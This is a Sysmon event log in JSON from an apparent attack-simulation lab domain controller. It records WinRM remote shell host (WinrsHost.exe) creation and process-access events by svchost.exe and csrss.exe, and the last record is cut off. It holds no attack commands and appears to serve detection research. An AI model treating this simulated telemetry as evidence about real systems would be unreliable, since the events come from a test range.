{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5829,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.330\r\nProcessGuid: {E2A3D6B1-11D8-5F25-0000-0010F7800800}\r\nProcessId: 5064\r\nImage: C:\\Windows\\System32\\winrshost.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Host Process for WinRM's Remote Shell plugin\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: winrshost.exe\r\nCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D8-5F25-0000-0020C7800800}\r\nLogonId: 0x880C7\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96\r\nParentProcessGuid: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nParentProcessId: 596\r\nParentImage: C:\\Windows\\System32\\svchost.exe\r\nParentCommandLine: C:\\Windows\\system32\\svchost.exe -k DcomLaunch","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.330","ProcessGuid":"{E2A3D6B1-11D8-5F25-0000-0010F7800800}","Image":"C:\\Windows\\System32\\winrshost.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Host Process for WinRM's Remote Shell plugin","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"winrshost.exe","CommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","CurrentDirectory":"C:\\Windows\\system32\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D8-5F25-0000-0020C7800800}","LogonId":"0x880c7","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96","ParentProcessGuid":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","ParentProcessId":"596","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5830,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.323\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D8-5F25-0000-0010F7800800}\r\nTargetProcessId: 5064\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.323","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-11D8-5F25-0000-0010F7800800}","TargetProcessId":"5064","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5831,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.323\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11D8-5F25-0000-0010F7800800}\r\nTargetProcessId: 5064\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.323","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11D8-5F25-0000-0010F7800800}","TargetProcessId":"5064","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5832,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.323\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.323","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5833,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.323\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.323","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5834,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.323\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.323","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5835,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.323\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.323","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5836,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.323\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.323","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5837,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.323\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: 